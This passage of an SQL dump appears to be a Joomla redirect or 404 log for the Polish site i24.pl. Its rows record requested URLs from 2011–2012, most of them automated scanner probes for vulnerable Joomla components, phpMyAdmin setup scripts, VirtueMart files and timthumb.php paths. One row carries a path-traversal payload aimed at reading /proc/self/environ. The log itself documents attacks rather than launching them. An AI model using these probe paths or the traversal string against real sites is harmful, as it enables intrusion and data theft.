03:09:52','0000-00-00 00:00:00'),(935,'http://www.i24.pl/joomla/index.php?option=com_addressbook&controller=','','','',0,'2011-12-29 03:09:52','0000-00-00 00:00:00'),(936,'http://www.i24.pl/joomla/index.php?option=com_flexicontent&controller=../../../../../../../proc/self/environ\0','','','',0,'2011-12-29 03:09:53','0000-00-00 00:00:00'),(937,'http://www.i24.pl/joomla/index.php?option=com_advertising&controller=','','','',0,'2011-12-29 03:09:54','0000-00-00 00:00:00'),(938,'http://www.i24.pl/joomla/index.php?option=com_cvmaker&controller=','','','',0,'2011-12-29 03:09:54','0000-00-00 00:00:00'),(939,'http://www.i24.pl/joomla/index.php?option=com_worldrates&controller=','','','',0,'2011-12-29 03:09:55','0000-00-00 00:00:00'),(940,'http://www.i24.pl/joomla/index.php?option=com_record&controller=','','','',0,'2011-12-29 03:09:56','0000-00-00 00:00:00'),(941,'http://www.i24.pl/joomla/index.php?option=com_sweetykeeper&controller=','','','',0,'2011-12-29 03:09:56','0000-00-00 00:00:00'),(942,'http://www.i24.pl/joomla/index.php?option=com_beeheard&controller=','','','',0,'2011-12-29 03:09:57','0000-00-00 00:00:00'),(943,'http://www.i24.pl/joomla/index.php?option=com_blogfactory&controller=','','','',0,'2011-12-29 03:09:58','0000-00-00 00:00:00'),(944,'http://www.i24.pl/joomla/index.php?option=com_delicious&controller=','','','',0,'2011-12-29 03:09:59','0000-00-00 00:00:00'),(945,'http://www.i24.pl/joomla/index.php?option=com_jacomment&view=','','','',0,'2011-12-29 03:09:59','0000-00-00 00:00:00'),(946,'http://www.i24.pl/joomla/index.php?option=com_lovefactory&controller=','','','',0,'2011-12-29 03:10:00','0000-00-00 00:00:00'),(947,'http://www.i24.pl/joomla/index.php?option=com_mtfireeagle&controller=','','','',0,'2011-12-29 03:10:01','0000-00-00 00:00:00'),(948,'http://www.i24.pl/joomla/index.php?option=com_photobattle&view=','','','',0,'2011-12-29 03:10:01','0000-00-00 00:00:00'),(949,'http://www.i24.pl/joomla/index.php?option=com_s5clanroster&view=','','','',0,'2011-12-29 03:10:02','0000-00-00 00:00:00'),(950,'http://www.i24.pl/joomla/index.php?option=com_s5clanroster&controller=','','','',0,'2011-12-29 03:10:03','0000-00-00 00:00:00'),(951,'http://www.i24.pl/joomla/index.php?option=com_wgpicasa&controller=','','','',0,'2011-12-29 03:10:03','0000-00-00 00:00:00'),(952,'http://www.i24.pl/joomla/index.php?option=com_zimbcomment&controller=','','','',0,'2011-12-29 03:10:04','0000-00-00 00:00:00'),(953,'http://www.i24.pl/joomla/index.php?option=com_zimbcore&controller=','','','',0,'2011-12-29 03:10:05','0000-00-00 00:00:00'),(954,'http://www.i24.pl/joomla/index.php?option=com_gadgetfactory&controller=','','','',0,'2011-12-29 03:10:05','0000-00-00 00:00:00'),(955,'http://www.i24.pl/joomla/index.php?option=com_matamko&controller=','','','',0,'2011-12-29 03:10:06','0000-00-00 00:00:00'),(956,'http://www.i24.pl/joomla/index.php?option=com_archeryscores&controller=','','','',0,'2011-12-29 03:10:07','0000-00-00 00:00:00'),(957,'http://www.i24.pl/joomla/index.php?option=com_multiroot&controller=','','','',0,'2011-12-29 03:10:08','0000-00-00 00:00:00'),(958,'http://www.i24.pl/joomla/index.php?option=com_multimap&controller=','','','',0,'2011-12-29 03:10:08','0000-00-00 00:00:00'),(959,'http://www.i24.pl/joomla/index.php?option=com_drawroot&controller=','','','',0,'2011-12-29 03:10:09','0000-00-00 00:00:00'),(960,'http://www.i24.pl/joomla/index.php?option=com_google&controller=','','','',0,'2011-12-29 03:10:10','0000-00-00 00:00:00'),(961,'http://www.i24.pl/joomla/index.php?option=com_if_surfalert&controller=','','','',0,'2011-12-29 03:10:10','0000-00-00 00:00:00'),(962,'http://www.i24.pl/joomla/index.php?option=com_orgchart&controller=','','','',0,'2011-12-29 03:10:11','0000-00-00 00:00:00'),(963,'http://www.i24.pl/joomla/index.php?option=com_mmsblog&controller=','','','',0,'2011-12-29 03:10:12','0000-00-00 00:00:00'),(964,'http://www.i24.pl/joomla/index.php?option=com_wmi&controller=','','','',0,'2011-12-29 03:10:12','0000-00-00 00:00:00'),(965,'http://www.i24.pl/joomla/index.php?option=com_ultimateportfolio&controller=','','','',0,'2011-12-29 03:10:13','0000-00-00 00:00:00'),(966,'http://www.i24.pl/joomla/index.php?option=com_noticeboard&controller=','','','',0,'2011-12-29 03:10:14','0000-00-00 00:00:00'),(967,'http://www.i24.pl/joomla/index.php?option=com_smartsite&controller=','','','',0,'2011-12-29 03:10:15','0000-00-00 00:00:00'),(968,'http://www.i24.pl/joomla/index.php?option=com_graphics&controller=','','','',0,'2011-12-29 03:10:15','0000-00-00 00:00:00'),(969,'http://www.i24.pl/joomla/index.php?option=com_php&file=','','','',0,'2011-12-29 03:10:16','0000-00-00 00:00:00'),(970,'http://www.i24.pl/joomla/index.php?option=com_aardvertiser&task=','','','',0,'2011-12-29 03:10:17','0000-00-00 00:00:00'),(971,'http://www.i24.pl/joomla/index.php?option=com_jejob&view=','','','',0,'2011-12-29 03:10:17','0000-00-00 00:00:00'),(972,'http://www.i24.pl/joomla/index.php?option=com_jeajaxeventcalendar&view=','','','',0,'2011-12-29 03:10:18','0000-00-00 00:00:00'),(973,'http://www.i24.pl/joomla/index.php?option=com_dioneformwizard&controller=','','','',0,'2011-12-29 03:10:19','0000-00-00 00:00:00'),(974,'http://www.i24.pl/joomla/index.php?option=com_jequoteform&view=','','','',0,'2011-12-29 03:10:19','0000-00-00 00:00:00'),(975,'http://www.i24.pl/joomla/index.php?option=com_mscomment&controller=','','','',0,'2011-12-29 03:10:20','0000-00-00 00:00:00'),(976,'http://www.i24.pl/joomla/index.php?option=com_simpledownload&controller=','','','',0,'2011-12-29 03:10:21','0000-00-00 00:00:00'),(977,'http://www.i24.pl/joomla/index.php?option=com_event&view=','','','',0,'2011-12-29 03:10:22','0000-00-00 00:00:00'),(978,'http://www.i24.pl/joomla/index.php?option=com_product&controller=','','','',0,'2011-12-29 03:10:22','0000-00-00 00:00:00'),(979,'http://www.i24.pl/joomla/index.php?option=com_job&controller=','','','',0,'2011-12-29 03:10:23','0000-00-00 00:00:00'),(980,'http://www.i24.pl/joomla/index2.php?option=com_simpledownload&controller=','','','',0,'2011-12-29 03:10:24','0000-00-00 00:00:00'),(981,'http://www.i24.pl/joomla/index.php?option=com_perchaimageattach&controller=','','','',0,'2011-12-29 03:10:24','0000-00-00 00:00:00'),(982,'http://www.i24.pl/joomla/index.php?option=com_perchafieldsattach&controller=','','','',0,'2011-12-29 03:10:25','0000-00-00 00:00:00'),(983,'http://www.i24.pl/joomla/index.php?option=com_perchagallery&controller=','','','',0,'2011-12-29 03:10:26','0000-00-00 00:00:00'),(984,'http://www.i24.pl/taryfy','','','',0,'2011-12-31 03:43:42','0000-00-00 00:00:00'),(985,'http://www.i24.pl//scripts/setup.php','','','',0,'2011-12-31 14:20:11','0000-00-00 00:00:00'),(986,'http://www.i24.pl//phpmyadmin/scripts/setup.php','','','',0,'2011-12-31 14:20:12','0000-00-00 00:00:00'),(987,'http://www.i24.pl//pma/scripts/setup.php','','','',0,'2011-12-31 14:20:13','0000-00-00 00:00:00'),(988,'http://www.i24.pl//mysql/scripts/setup.php','','','',0,'2011-12-31 14:20:14','0000-00-00 00:00:00'),(989,'http://www.i24.pl/szybki-dostep-do-internetu/8','','','',0,'2012-01-03 11:32:09','0000-00-00 00:00:00'),(990,'http://www.i24.pl/test','','','',0,'2012-01-03 17:58:43','0000-00-00 00:00:00'),(991,'http://www.i24.pl/szybki-dostep-do-internetu/kontakt','','','',0,'2012-01-04 21:04:40','0000-00-00 00:00:00'),(992,'http://www.i24.pl/administrator/components/com_virtuemart/html/account.index.php','','','',0,'2012-01-05 12:31:35','0000-00-00 00:00:00'),(993,'http://www.i24.pl/administrator/components/com_virtuemart/views/virtuemart/tmpl/default.php','','','',0,'2012-01-05 12:31:36','0000-00-00 00:00:00'),(994,'http://www.i24.pl/index.php?option=com_virtuemart&page=shop.registration','','','',0,'2012-01-05 12:31:36','0000-00-00 00:00:00'),(995,'http://www.i24.pl/index.php?option=com_virtuemart&page=shop.debug','','','',0,'2012-01-05 12:31:36','0000-00-00 00:00:00'),(996,'http://www.i24.pl//(','','http://www.i24.pl/','',0,'2012-01-06 03:01:30','0000-00-00 00:00:00'),(997,'http://www.i24.pl//blog/wp-content/plugins/uBillboard/timthumb.php','','','',0,'2012-01-12 06:42:03','0000-00-00 00:00:00'),(998,'http://www.i24.pl//blog/wp-content/themes/TheStyle/timthumb.php','','','',0,'2012-01-12 06:42:09','0000-00-00 00:00:00'),(999,'http://www.i24.pl//blog/wp-content/themes/SimplePress/timthumb.php','','','',0,'2012-01-12 06:42:12','0000-00-00 00:00:00'),(1000,'http://www.i24.pl//blog/wp-content/themes/DailyNotes/timthumb.php','','','',0,'2012-01-12 06:42:16','0000-00-00 00:00:00'),(1001,'http://www.i24.pl//blog/wp-content/themes/eNews/timthumb.php','','','',0,'2012-01-12 06:42:18','0000-00-00 00:00:00'),(1002,'http://www.i24.pl//blog/wp-content/themes/DeepFocus/timthumb.php','','','',0,'2012-01-12 06:42:22','0000-00-00 00:00:00'),(1003,'http://www.i24.pl//blog/wp-content/plugins/wp_mobile_detector/timthumb.php','','','',0,'2012-01-12 06:42:25','0000-00-00 00:00:00'),(1004,'http://www.i24.pl//blog/wp-content/plugins/islidex/js/timthumb.php','','','',0,'2012-01-12 06:42:27','0000-00-00 00:00:00'),(1005,'http://www.i24.pl//blog/wp-content/plugins/wp-thumbie/timthumb.php','','','',0,'2012-01-12 06:42:30','0000-00-00 00:00:00'),(1006,'http://www.i24.pl//blog/wp-content/plugins/simple-post-thumbnails/timthumb.php','','','',0,'2012-01-12 06:42:33','0000-00-00 00:00:00'),(1007,'http://www.i24.pl//blog/wp-content/plugins//wp-content/plugins/highlighter/libs/timthumb.php','','','',0,'2012-01-12 06:42:36','0000-00-00 00:00:00'),(1008,'http://www.i24.pl//blog/wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/timthumb.php','','','',0,'2012-01-12 06:42:39','0000-00-00 00:00:00'),(1009,'http://www.i24.pl//blog/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php','','','',0,'2012-01-12 06:42:42','0000-00-00 00:00:00'),(1010,'http://www.i24.pl//blog/wp-content/plugins/wp_rokstories/timthumb.php','','','',0,'2012-01-12 06:42:45','0000-00-00 00:00:00'),(1011,'http://www.i24.pl//blog/wp-content/plugins/dukapress/lib/timthumb.php','','','',0,'2012-01-12 06:42:48','0000-00-00 00:00:00'),(1012,'http://www.i24.pl//blog/wp-content/plugins/smooth-slider/scripts/timthumb.php','','','',0,'2012-01-12 06:42:51','0000-00-00 00:00:00'),(1013,'http://www.i24.pl//blog/wp-content/plugins/cac-featured-content/timthumb.php','','','',0,'2012-01-12 06:42:54','0000-00-00 00:00:00'),(1014,'http://www.i24.pl//blog/wp-content/plugins/directorypress/thumbs/timthumb.php','','','',0,'2012-01-12 06:42:57','0000-00-00 00:00:00'),(1015,'http://www.i24.pl//blog/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php','','','',0,'2012-01-12 06:42:59','0000-00-00 00:00:00'),(1016,'http://www.i24.pl//blog/wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php','','','',0,'2012-01-12 06:43:02','0000-00-00 00:00:00'),(1017,'http://www.i24.pl//wp-content/plugins/uBillboard/timthumb.php','','','',0,'2012-01-12 09:50:55','0000-00-00 00:00:00'),(1018,'http://www.i24.pl//wp-content/themes/TheStyle/timthumb.php','','','',0,'2012-01-12 09:51:01','0000-00-00 00:00:00'),(1019,'http://www.i24.pl//wp-content/themes/SimplePress/timthumb.php','','','',0,'2012-01-12 09:51:04','0000-00-00 00:00:00'),(1020,'http://www.i24.pl//wp-content/themes/DailyNotes/timthumb.php','','','',0,'2012-01-12 09:51:06','0000-00-00 00:00:00'),(1021,'http://www.i24.pl//wp-content/themes/eNews/timthumb.php','','','',0,'2012-01-12 09:51:09','0000-00-00 00:00:00'),(1022,'http://www.i24.pl//wp-content/themes/DeepFocus/timthumb.php','','','',0,'2012-01-12 09:51:11','0000-00-00 00:00:00'),(1023,'http://www.i24.pl//wp-content/plugins/wp_mobile_detector/timthumb.php','','','',0,'2012-01-12 09:51:27','0000-00-00 00:00:00'),(1024,'http://www.i24.pl//wp-content/plugins/islidex/js/timthumb.php','','','',0,'2012-01-12 09:51:29','0000-00-00 00:00:00'),(1025,'http://www.i24.pl//wp-content/plugins/wp-thumbie/timthumb.php','','','',0,'2012-01-12 09:51:32','0000-00-00 00:00:00'),(1026,'http://www.i24.pl//wp-content/plugins/simple-post-thumbnails/timthumb.php','','','',0,'2012-01-12 09:51:34','0000-00-00 00:00:00'),(1027,'http://www.i24.pl//wp-content/plugins//wp-content/plugins/highlighter/libs/timthumb.php','','','',0,'2012-01-12 09:51:37','0000-00-00 00:00:00'),(1028,'http://www.i24.pl//wp-content/themes/sakura/plugins/woo-tumblog/functions/cache/timthumb.php','','','',0,'2012-01-12 09:51:39','0000-00-00 00:00:00'),(1029,'http://www.i24.pl//wp-content/plugins/dp-thumbnail/timthumb/timthumb.php','','','',0,'2012-01-12 09:51:41','0000-00-00 00:00:00'),(1030,'http://www.i24.pl//wp-content/plugins/wp_rokstories/timthumb.php','','','',0,'2012-01-12 09:51:44','0000-00-00 00:00:00'),(1031,'http://www.i24.pl//wp-content/plugins/dukapress/lib/timthumb.php','','','',0,'2012-01-12 09:51:46','0000-00-00 00:00:00'),(1032,'http://www.i24.pl//wp-content/plugins/smooth-slider/scripts/timthumb.php','','','',0,'2012-01-12 09:51:49','0000-00-00 00:00:00'),(1033,'http://www.i24.pl//wp-content/plugins/cac-featured-content/timthumb.php','','','',0,'2012-01-12 09:51:51','0000-00-00 00:00:00'),(1034,'http://www.i24.pl//wp-content/plugins/directorypress/thumbs/timthumb.php','','','',0,'2012-01-12 09:51:53','0000-00-00 00:00:00'),(1035,'http://www.i24.pl//wp-content/plugins/category-grid-view-gallery/includes/timthumb.php','','','',0,'2012-01-12 09:51:56','0000-00-00 00:00:00'),(1036,'http://www.i24.pl//wp-content/plugins/wordpress-popular-posts/scripts/timthumb.php','','','',0,'2012-01-12 09:51:58','0000-00-00 00:00:00'),(1037,'http://www.i24.plhttp//www.i24.pl','','','',0,'2012-01-14 03:04:00','0000-00-00 00:00:00'),(1038,'http://www.i24.pl/mailing.html','','http://www.i24.pl/','',0,'2012-01-23 14:02:03','0000-00-00 00:00:00'),(1039,'http://www.i24.pl/\\','','','',0,'2012-01-23 14:29:37','0000-00-00 00:00:00'),(1040,'http://www.i24.pl/regulamin.pdf','','http://www.i24.pl/','',0,'2012-01-25 08:32:14','0000-00-00 00:00:00'),(1041,'http://www.i24.pl/pocztapoc','','','',0,'2012-01-25 20:37:15','0000-00-00 00:00:00'),(1042,'http://www.i24.pl/linki.html','','','',0,'2012-01-27 20:24:18','0000-00-00 00:00:00'),(1043,'http://www.i24.pl/linki','','','',0,'2012-01-28 10:39:52','0000-00-00 00:00:00'),(1044,'http://www.i24.pl/